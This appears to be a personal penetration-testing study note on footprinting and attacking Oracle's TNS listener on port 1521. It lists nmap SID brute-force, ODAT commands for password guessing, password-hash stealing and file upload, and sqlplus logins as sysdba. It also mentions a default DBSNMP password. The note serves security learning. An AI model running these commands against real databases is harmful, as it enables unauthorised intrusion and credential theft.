TNS

footprinting

Transparent Network Substrate (TNS) is a protocol owned and developed by Oracle. It's mainly used to manage Oracle Databases.

It includes performance monitoring and analysis, error reporting, and logging tools. It supports a wide range of networking protocols such as IPX/SPX, TCP/IP, IPV6, and SSL/TLS. Communications are encrypted.

🐊️ Port: 1521 (TCP)

The server-side service that listens for clients is called a listener. Its configuration determines which networking protocols are allowed.


TNS Pentester Notes ☠️

List databases using brute force:

$ sudo nmap IP -p 1521 -sV --script oracle-sid-brute

Oracle Database Attacking Tool (1.5k ⭐, ODAT, 2022 ☠️) can be used to enumerate or exploit Oracle Databases.

$ sudo apt install odat
$ odat all -s IP
$ odat sidguesser -s IP
$ odat passwordguesser -s IP -d sid
$ odat passwordstealer -s IP -U username -P password -d sid --sysdba --get-passwords
$ odat utlfile [...] # file upload

πŸ“š User may have sys dba access, try --sysdba.

We can use Oracle SQLPlus to connect to the database:

$ sudo apt-get install oracle-instantclient-sqlplus
$ sudo updatedb
$ # if you got an error when running sqlplus
$ lpath=$(dirname `locate libsqlplus.so`) ; echo $lpath
$ sudo sh -c "echo $lpath > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
$ # connect
$ sqlplus username/password@IP/sid
$ sqlplus username/password@IP/sid as sysdba

πŸ“š User may have sys dba access, try as sysdba.


πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • tnsnames.ora (client-side infos, list of db/services configurations)
  • listener.ora (server-side config, listener config)
  • $ORACLE_HOME/network/admin folder
  • DBSNMP service has dbsnmp default password
  • Finger service?
  • PL/SQL Exclusion List (PlsqlExclusionList)
  • Remove Listener Management?